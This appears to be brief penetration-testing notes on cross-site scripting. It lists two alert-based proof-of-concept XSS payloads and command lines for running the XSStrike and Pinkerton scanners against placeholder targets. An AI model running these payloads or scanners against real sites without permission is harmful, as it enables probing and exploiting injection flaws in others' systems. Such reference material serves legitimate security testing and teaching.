XSS

XSS with HTML

<p><script>alert(document.domain)</script></p>
<p><img src=1 onerror=alert(1)></p>

Automation

XSSTRIKE

# GET request
python xsstrike.py -u "http://vulnerable.com/?param=test"

# POST request
python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"

# data as JSON
python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json

PINKERTON

git clone https://github.com/oppsec/pinkerton.git
cd pinkerton
pip3 install -r requirements.txt

python3 main.py -u https://example.com
